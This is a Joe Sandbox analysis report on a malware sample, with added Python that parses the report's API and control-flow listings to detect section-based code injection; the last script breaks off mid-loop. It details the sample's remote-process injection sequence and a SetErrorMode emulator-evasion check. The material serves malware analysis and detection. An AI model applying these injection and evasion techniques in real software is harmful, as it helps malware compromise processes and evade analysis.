control_flow_graph 0 418df0-418e18 2 418e20-418e27 0->2 3 418e54-418e5a 2->3 4 418e29-418e50 2->4 5 418e5c-418e68 3->5 6 418e6e-418e78 3->6 4->3 5->6 7 418eb3-418eba 6->7 8 418e7a-418ea9 6->8 7->2 9 418ec0-418ec6 7->9 8->7 11 418ec8-418ece 9->11 12 418ed0-418ed6 11->12 13 418edc-418ee6 11->13 12->13 14 418ee8 13->14 15 418eea-418ef1 13->15 14->15 15->11 16 418ef3-418efa 15->16 17 418f00-419016 InterlockedCompareExchange GetFocus ReadConsoleA FindAtomA SearchPathA SetConsoleMode SearchPathW GetDefaultCommConfigA CopyFileExW CreatePipe GetEnvironmentStringsW WriteConsoleOutputA GetModuleFileNameA GetSystemTimeAdjustment 16->17 18 419046-419052 16->18 21 419024-41902b 17->21 22 419018-41901e ObjectPrivilegeAuditAlarmW 17->22 19 419054-419062 SetCommState 18->19 26 419064-41906b 19->26 27 41906d-419074 19->27 24 419035-419043 21->24 25 41902d-41902f WaitForSingleObject 21->25 22->21 24->18 25->24 26->19 26->27 28 41912a-419139 call 418ac0 27->28 29 41907a-419124 GetConsoleAliasesLengthW GetComputerNameA CopyFileW GetFileAttributesA GetConsoleAliasExesLengthW GetBinaryType FormatMessageA GetLongPathNameA PurgeComm 27->29 34 41913b-41914c 28->34 35 41916d-419178 LoadLibraryA call 418af0 28->35 29->28 37 419150-419160 34->37 42 41917d-41918e call 418d50 35->42 40 419162 37->40 41 419168-41916b 37->41 40->41 41->35 41->37 46 419190-419197 42->46 48 419199-4191a7 MoveFileW 46->48 49 4191ad-4191b3 46->49 48->49 50 4191b5 call 418ae0 49->50 51 4191ba-4191c1 49->51 50->51 54 4191c3-4191ce InterlockedCompareExchange 51->54 55 4191d4-4191db 51->55 54->55 55->46 57 4191dd-4191ed 55->57 58 4191f0-419200 57->58 60 419202 58->60 61 419209-41920c 58->61 60->61 61->58 62 41920e-419219 61->62 63 419220-419225 62->63 64 419227-41922d 63->64 65 41922f-419235 63->65 64->65 66 419237-419244 64->66 65->63 65->66
APIs
• InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00418F0B
• GetFocus.USER32 ref: 00418F11
• ReadConsoleA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00418F1E
• FindAtomA.KERNEL32(00000000), ref: 00418F25
• SearchPathA.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00418F3D
• SetConsoleMode.KERNEL32(00000000,00000000), ref: 00418F45
• SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00418F5D
• GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 00418F84
• CopyFileExW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00418F90
• CreatePipe.KERNEL32(?,00000000,00000000,00000000), ref: 00418FA6
• GetEnvironmentStringsW.KERNEL32 ref: 00418FAC
• WriteConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 00418FF1
• GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00419000
• GetSystemTimeAdjustment.KERNEL32(00000000,00000000,00000000), ref: 00419009
• ObjectPrivilegeAuditAlarmW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041901E
• WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0041902F
• SetCommState.KERNELBASE(00000000,00000000), ref: 00419058
• GetConsoleAliasesLengthW.KERNEL32(00000000), ref: 00419089
• GetComputerNameA.KERNEL32(?,?), ref: 0041909D
• CopyFileW.KERNEL32(0041B3AC,0041B380,00000000), ref: 004190AE
• GetFileAttributesA.KERNEL32(00000000), ref: 004190B5
• GetConsoleAliasExesLengthW.KERNEL32 ref: 004190BB
• GetBinaryType.KERNEL32(0041B3C8,?), ref: 004190CD
• FormatMessageA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 004190E0
• GetLongPathNameA.KERNEL32(0041B3E4,?,00000000), ref: 004190F3
• PurgeComm.KERNEL32(00000000,00000000), ref: 004190FB
• LoadLibraryA.KERNELBASE(0041B3EC), ref: 00419172
• MoveFileW.KERNEL32(00000000,00000000), ref: 004191A7
• InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 004191CE
Strings
Memory Dump Source
• Source File: 00000006.00000002.2516656554.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_40b000_jvgasii.jbxd
Similarity
• API ID: ConsoleFile$CommNamePath$CompareCopyExchangeInterlockedLengthObjectSearch$AdjustmentAlarmAliasAliasesAtomAttributesAuditBinaryComputerConfigCreateDefaultEnvironmentExesFindFocusFormatLibraryLoadLongMessageModeModuleMoveOutputPipePrivilegePurgeReadSingleStateStringsSystemTimeTypeWaitWrite
• String ID: k`$}$
• API String ID: 2220722107-956986773
• Opcode ID: 76067d98ed010348569ee083334d6030e4c9192beea86e856fa9a0357b35bb33
• Instruction ID: 4ca0833080540fc1689ebbf06c0baecda7ebd0e2289d1b61a46df4a83d3cd1a5
• Opcode Fuzzy Hash: 76067d98ed010348569ee083334d6030e4c9192beea86e856fa9a0357b35bb33
• Instruction Fuzzy Hash: F9B1B371902124ABDB219FA1EC48EDF7B79EF4D750F00806AF649A2151C7781AC5CFAE

Control-flow Graph: interactive graph omitted; basic blocks 401514-4018e3, calling 401193 and 4016e5, with NtDuplicateObject, NtCreateSection (2 sites) and NtMapViewOfSection (4 sites)
APIs
• NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
• NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
• NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
Memory Dump Source
• Source File: 00000006.00000002.2516620134.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_jvgasii.jbxd
Similarity
• API ID: Section$View$Create$DuplicateObject
• String ID:
• API String ID: 1546783058-0
• Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
• Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
• Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
• Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

Control-flow Graph: interactive graph omitted; basic blocks 4014fe-4018e3, calling 401193 and 4016e5, with NtDuplicateObject, NtCreateSection (2 sites) and NtMapViewOfSection (4 sites)
APIs
• NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
• NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
Memory Dump Source
• Source File: 00000006.00000002.2516620134.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_jvgasii.jbxd
Similarity
• API ID: Section$CreateDuplicateObjectView
• String ID:
• API String ID: 1652636561-0
• Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
• Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
• Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
• Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

Control-flow Graph: interactive graph omitted; basic blocks 401542-4018e3, calling 401193 and 4016e5, with NtDuplicateObject, NtCreateSection (2 sites) and NtMapViewOfSection (4 sites)
APIs
• NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
• NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
• NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
Memory Dump Source
• Source File: 00000006.00000002.2516620134.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_jvgasii.jbxd
Similarity
• API ID: Section$View$Create$DuplicateObject
• String ID:
• API String ID: 1546783058-0
• Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
• Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
• Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
• Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

Control-flow Graph: interactive graph omitted; basic blocks 401549-4018e3, calling 401193 and 4016e5, with NtDuplicateObject, NtCreateSection (2 sites) and NtMapViewOfSection (4 sites)
APIs
• NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
• NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
• NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
Memory Dump Source
• Source File: 00000006.00000002.2516620134.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_jvgasii.jbxd
Similarity
• API ID: Section$View$Create$DuplicateObject
• String ID:
• API String ID: 1546783058-0
• Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
• Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
• Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
• Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

Control-flow Graph: interactive graph omitted; basic blocks 40154f-4018e3 (entry 401557), calling 401193 and 4016e5, with NtDuplicateObject, NtCreateSection (2 sites) and NtMapViewOfSection (4 sites)
APIs
• NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
• NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
• NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
Memory Dump Source
• Source File: 00000006.00000002.2516620134.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_jvgasii.jbxd
Similarity
• API ID: Section$View$Create$DuplicateObject
• String ID:
• API String ID: 1546783058-0
• Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
• Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
• Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
• Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

Control-flow Graph: interactive graph omitted; basic blocks 402f97-4030f3, with RtlCreateUserThread and NtTerminateProcess in block 40307c-4030eb
APIs
Memory Dump Source
• Source File: 00000006.00000002.2516620134.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_jvgasii.jbxd
Similarity
• API ID: CreateProcessTerminateThreadUser
• String ID:
• API String ID: 1921587553-0
• Opcode ID: c5436c7e7e6e3e410a730c8ca40359fc9cb55dc58de8f82c61b8b97930139c1a
• Instruction ID: 181ab879d947f068327b1ec0ddd27223b5b0ac2a90c427e8f19d47aa25efb225
• Opcode Fuzzy Hash: c5436c7e7e6e3e410a730c8ca40359fc9cb55dc58de8f82c61b8b97930139c1a
• Instruction Fuzzy Hash: 67417631228E0C4FD3A8DF2CA845BA277D5FB94311F6643AAE809D3389FA74C80183C5
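The records above (sub_401514 and its alternate entries, followed by the 402f97 block) document the injection primitive behind the report's "Maps a DLL or memory area into another process" and "Creates a thread in another existing process" signatures: NtDuplicateObject with DUPLICATE_SAME_ACCESS (0x2), then two pagefile-backed NtCreateSection calls (FileHandle 0, SEC_COMMIT 0x08000000), each mapped once into the current process (handle -1) as PAGE_READWRITE (0x04) and once into another process, the second section being created PAGE_EXECUTE_READWRITE (0x40) and mapped remotely PAGE_EXECUTE_READ (0x20), before a thread is started in the target. The Python below is an added example, not code from Joe Sandbox or from the sample: it parses API lines in the report's own format, decodes the access and protection columns with the public winnt.h/ntifs.h values, and flags a pagefile-backed section that is mapped writable locally and executable remotely. The sample input copies the seven lines of sub_401514; the RtlCreateUserThread line is constructed (the report shows that call only in the graph, without arguments) and tagged with the graph's block address. Treating the printed 000000FF as the NtCurrentProcess pseudo-handle is an assumption about how the report renders -1.

```python
"""Parse Joe Sandbox-style API call lines and flag section-based code injection.

Added example, not part of the Joe Sandbox report.  Flag values are the public
winnt.h / ntifs.h constants.  The sample trace copies the sub_401514 record; the
RtlCreateUserThread line is constructed (shown in the report only as a graph node).
"""
import re
from dataclasses import dataclass
from typing import Optional

# SectionPageProtection / Win32Protect values (winnt.h).
PAGE_NAMES = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
              0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
EXECUTABLE_PAGES = {0x10, 0x20, 0x40, 0x80}
SEC_COMMIT = 0x08000000          # AllocationAttributes of a pagefile-backed section
DUPLICATE_SAME_ACCESS = 0x2
# NtCurrentProcess() is (HANDLE)-1; the report prints it as 000000FF, so both
# renderings are accepted here (assumption about the report's formatting).
CURRENT_PROCESS = {0xFF, 0xFFFFFFFF}
REMOTE_THREAD_APIS = {"RtlCreateUserThread", "NtCreateThreadEx", "CreateRemoteThread"}

LINE_RE = re.compile(r"^\s*•?\s*(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]+)\s*$")

SAMPLE = """
NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
RtlCreateUserThread.NTDLL(?,?,?,?,?,?,?,?,?,?), ref: 0040307C
"""


@dataclass
class ApiCall:
    name: str
    module: str
    args: list            # int per hex column, None where the report prints '?'
    ref: int              # call-site address

    def arg(self, i: int) -> Optional[int]:
        return self.args[i] if i < len(self.args) else None


def parse_api_line(line: str) -> Optional[ApiCall]:
    m = LINE_RE.match(line)
    if not m:
        return None
    name, module, raw, ref = m.groups()
    args = [None if a == "?" else int(a, 16) for a in raw.split(",") if a]
    return ApiCall(name, module, args, int(ref, 16))


def parse_api_lines(text: str) -> list:
    return [c for c in map(parse_api_line, text.splitlines()) if c is not None]


def describe_protect(value: Optional[int]) -> str:
    return "?" if value is None else PAGE_NAMES.get(value, hex(value))


def find_section_injection(calls: list) -> list:
    """Replay the calls in order; one finding per NtCreateSection.

    Section handles are printed as '?', so each NtMapViewOfSection is attributed
    to the most recently created section (ordering heuristic, not handle tracking).
    NtMapViewOfSection args: (SectionHandle, ProcessHandle, BaseAddress, ZeroBits,
    CommitSize, SectionOffset, ViewSize, InheritDisposition, AllocationType, Win32Protect).
    """
    findings, current, thread_seen = [], None, False
    for c in calls:
        if c.name == "NtCreateSection":
            # (SectionHandle, DesiredAccess, ObjectAttributes, MaximumSize,
            #  SectionPageProtection, AllocationAttributes, FileHandle)
            current = {"ref": c.ref, "access": c.arg(1), "page_protect": c.arg(4),
                       "sec_commit": c.arg(5) == SEC_COMMIT,
                       "pagefile_backed": c.arg(6) == 0,
                       "local_views": [], "remote_views": []}
            findings.append(current)
        elif c.name == "NtMapViewOfSection" and current is not None:
            proc, prot = c.arg(1), c.arg(9)
            key = "local_views" if proc in CURRENT_PROCESS else "remote_views"
            current[key].append(prot)
        elif c.name in REMOTE_THREAD_APIS:
            thread_seen = True
    for f in findings:
        remote_exec = any(p in EXECUTABLE_PAGES for p in f["remote_views"] if p is not None)
        section_exec = f["page_protect"] in EXECUTABLE_PAGES
        f["injection"] = bool(f["pagefile_backed"] and f["local_views"]
                              and f["remote_views"] and (remote_exec or section_exec))
        f["execution"] = f["injection"] and thread_seen
        f["summary"] = "NtCreateSection@%08X section=%s local=%s remote=%s -> %s" % (
            f["ref"], describe_protect(f["page_protect"]),
            ",".join(map(describe_protect, f["local_views"])),
            ",".join(map(describe_protect, f["remote_views"])),
            "INJECTION+THREAD" if f["execution"] else
            "injection" if f["injection"] else "benign-looking")
    return findings


if __name__ == "__main__":
    for finding in find_section_injection(parse_api_lines(SAMPLE)):
        print(finding["summary"])
```

Run against the sample trace, the first section (created PAGE_READWRITE, both views PAGE_READWRITE) is reported as benign-looking while the second (created PAGE_EXECUTE_READWRITE, remote view PAGE_EXECUTE_READ, followed by RtlCreateUserThread) is reported as INJECTION+THREAD. The same parser can be pointed at the API lists of other records in this report; the ordering heuristic is what makes a per-function listing usable without handle values, and it is also the heuristic's weakness when a function interleaves views of several sections.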

Control-flow Graph: interactive graph omitted; basic blocks 6b003c-6b091d, calling 6b0a3f, 6b0e0f, 6b0d90, 6b0a69, 6b0cce and 6b0ce7, with VirtualAlloc, VirtualProtect, VirtualFree and LoadLibraryA
APIs
• VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 006B024D
Strings
Memory Dump Source
• Source File: 00000006.00000002.2516805210.00000000006B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_6b0000_jvgasii.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID: cess$kernel32.dll
• API String ID: 4275171209-1230238691
• Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                            • Instruction ID: 1cbfe1bad8ad953d37be5dc3ae992457c84081cda89f7c9b413a08e1e8265b97
                                                                                                                            • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                            • Instruction Fuzzy Hash: 275279B5A00229DFDB64CF58C984BA9BBB1BF09304F1480E9E50DAB351DB30AE85DF14

                                                                                                                             Control-flow Graph
                                                                                                                            control_flow_graph 370 418af0-418c30 GetModuleHandleW GetProcAddress VirtualProtect
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(00514D70), ref: 00418BCF
                                                                                                                            • GetProcAddress.KERNEL32(00000000,0041F298), ref: 00418C0C
                                                                                                                            • VirtualProtect.KERNELBASE(00514BB4,00514D6C,00000040,?), ref: 00418C2B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.2516656554.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_40b000_jvgasii.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2099061454-3916222277
                                                                                                                            • Opcode ID: 41ccab38266b7cc203b6ab2e2252d2e1a9a4558b246985cc843167c3f4a64001
                                                                                                                            • Instruction ID: 441cc07c50422e985bd597f44fd2245cc03bf1e09111bb194a1dfbca8cfcce31
                                                                                                                            • Opcode Fuzzy Hash: 41ccab38266b7cc203b6ab2e2252d2e1a9a4558b246985cc843167c3f4a64001
                                                                                                                            • Instruction Fuzzy Hash: 88314918508680CAEB01DB78FC057923B66AB75709F04E0B9D14C8B7B1D7BB051E9B6A

                                                                                                                             Control-flow Graph
                                                                                                                            control_flow_graph 393 7e0ae7-7e0b00 394 7e0b02-7e0b04 393->394 395 7e0b0b-7e0b17 CreateToolhelp32Snapshot 394->395 396 7e0b06 394->396 397 7e0b19-7e0b1f 395->397 398 7e0b27-7e0b34 Module32First 395->398 396->395 397->398 404 7e0b21-7e0b25 397->404 399 7e0b3d-7e0b45 398->399 400 7e0b36-7e0b37 call 7e07a6 398->400 405 7e0b3c 400->405 404->394 404->398 405->399
                                                                                                                            APIs
                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 007E0B0F
                                                                                                                            • Module32First.KERNEL32(00000000,00000224), ref: 007E0B2F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.2517016123.00000000007DD000.00000040.00000020.00020000.00000000.sdmp, Offset: 007DD000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_7dd000_jvgasii.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3833638111-0
                                                                                                                            • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                            • Instruction ID: 6243af257bd6482d5254a30fe8d0f6230318426562d932069a697e55021b0894
                                                                                                                            • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                            • Instruction Fuzzy Hash: 5AF0C231101351ABD7202BB6AC8DF6A72E8BF4C328F100528E642910C0DAB8E8858AA0

                                                                                                                             Control-flow Graph
                                                                                                                            control_flow_graph 406 6b0e0f-6b0e24 SetErrorMode * 2 407 6b0e2b-6b0e2c 406->407 408 6b0e26 406->408 408->407
                                                                                                                            APIs
                                                                                                                            • SetErrorMode.KERNELBASE(00000400,?,?,006B0223,?,?), ref: 006B0E19
                                                                                                                            • SetErrorMode.KERNELBASE(00000000,?,?,006B0223,?,?), ref: 006B0E1E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.2516805210.00000000006B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_6b0000_jvgasii.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorMode
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2340568224-0
                                                                                                                            • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                            • Instruction ID: 5ec0122905795958cf8b6ea84eb92189ad46b0a0d2fb6fa6a8bc84ef3f06bca4
                                                                                                                            • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                            • Instruction Fuzzy Hash: 19D0123114512877D7002A94DC09BCE7F1CDF05B62F008411FB0DD9180C770994147E5
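The `control_flow_graph` lines in these listings are Joe Sandbox's flattened basic-block graphs: a decimal node id followed by the block's address range, then any API names, `call` targets or `* n` repeat counts that belong to that block, and `a->b` edges. Read raw they are nearly useless, so the following Python is an added example (not part of the report and not Joe Sandbox tooling) that parses that format for the SetErrorMode function at 0x6b0e0f and the Toolhelp32 function at 0x7e0ae7 shown above, and answers the questions an analyst asks of such a graph: which blocks call APIs, whether a two-way branch follows the call (so the return value is being tested), and whether the call sits in a loop. For 0x6b0e0f it shows both SetErrorMode calls in one block followed by a conditional. Calling SetErrorMode with an arbitrary value such as 0x400 and then with 0, and checking that the second call returns the first value, is a widely used emulator check because a faithful implementation must return the previously set mode; the graph only shows that a branch follows the pair, not what it compares. The grammar (decimal id plus address token opens a node, `* n` repeats the previous API) is inferred from the lines on this page and is an assumption.

```python
import re
from collections import defaultdict

# Constructed copies of two "control_flow_graph" lines from the report above.
CFG_SETERRORMODE = ("control_flow_graph 406 6b0e0f-6b0e24 SetErrorMode * 2 "
                    "407 6b0e2b-6b0e2c 406->407 408 6b0e26 406->408 408->407")
CFG_TOOLHELP = ("control_flow_graph 393 7e0ae7-7e0b00 394 7e0b02-7e0b04 393->394 "
                "395 7e0b0b-7e0b17 CreateToolhelp32Snapshot 394->395 396 7e0b06 "
                "394->396 397 7e0b19-7e0b1f 395->397 398 7e0b27-7e0b34 Module32First "
                "395->398 396->395 397->398 404 7e0b21-7e0b25 397->404 399 7e0b3d-7e0b45 "
                "398->399 400 7e0b36-7e0b37 call 7e07a6 398->400 405 7e0b3c 400->405 "
                "404->394 404->398 405->399")

ADDR = re.compile(r"^[0-9a-f]+(-[0-9a-f]+)?$")   # "6b0e0f-6b0e24" or a single "6b0e26"
EDGE = re.compile(r"^(\d+)->(\d+)$")
API = re.compile(r"^[A-Z][A-Za-z0-9]*$")         # Win32 API names start with a capital


def parse_cfg(line):
    """Assumed grammar (inferred from the report): '<id> <addr-range>' opens a
    node; bare API names, 'call <addr>' and '* <n>' label the open node;
    'a->b' is an edge. Returns the entry id, the nodes and the edge list."""
    toks = line.split()
    if toks[0] != "control_flow_graph":
        raise ValueError("not a control_flow_graph line")
    nodes, edges, order, cur = {}, [], [], None
    i = 1
    while i < len(toks):
        t = toks[i]
        nxt = toks[i + 1] if i + 1 < len(toks) else ""
        m = EDGE.match(t)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            i += 1
        elif t.isdigit() and ADDR.match(nxt):
            cur = {"id": int(t), "range": nxt, "calls": [], "subcalls": []}
            nodes[cur["id"]] = cur
            order.append(cur["id"])
            i += 2
        elif t == "call":                      # internal call target, e.g. "call 7e07a6"
            cur["subcalls"].append(nxt)
            i += 2
        elif t == "*" and nxt.isdigit():       # "SetErrorMode * 2" = same API called twice
            cur["calls"].extend([cur["calls"][-1]] * (int(nxt) - 1))
            i += 2
        else:
            if API.match(t):
                cur["calls"].append(t)
            i += 1
    return {"entry": order[0], "nodes": nodes, "edges": edges}


def successors(g):
    succ = defaultdict(set)
    for a, b in g["edges"]:
        succ[a].add(b)
    return succ


def reachable(g, start=None):
    """Block ids reachable from start (default: the function entry)."""
    succ = successors(g)
    seen, stack = set(), [g["entry"] if start is None else start]
    while stack:
        n = stack.pop()
        if n not in seen:
            seen.add(n)
            stack.extend(succ[n])
    return seen


def in_loop(g, node_id):
    """True if the block can reach itself again, e.g. a retry loop around a call."""
    return any(node_id in reachable(g, s) for s in successors(g)[node_id])


def calls_followed_by_branch(g):
    """API-calling blocks with two or more successors: the code tests the
    call's outcome right after it returns."""
    succ = successors(g)
    return {n["id"]: n["calls"] for n in g["nodes"].values()
            if n["calls"] and len(succ[n["id"]]) > 1}


if __name__ == "__main__":
    for line in (CFG_SETERRORMODE, CFG_TOOLHELP):
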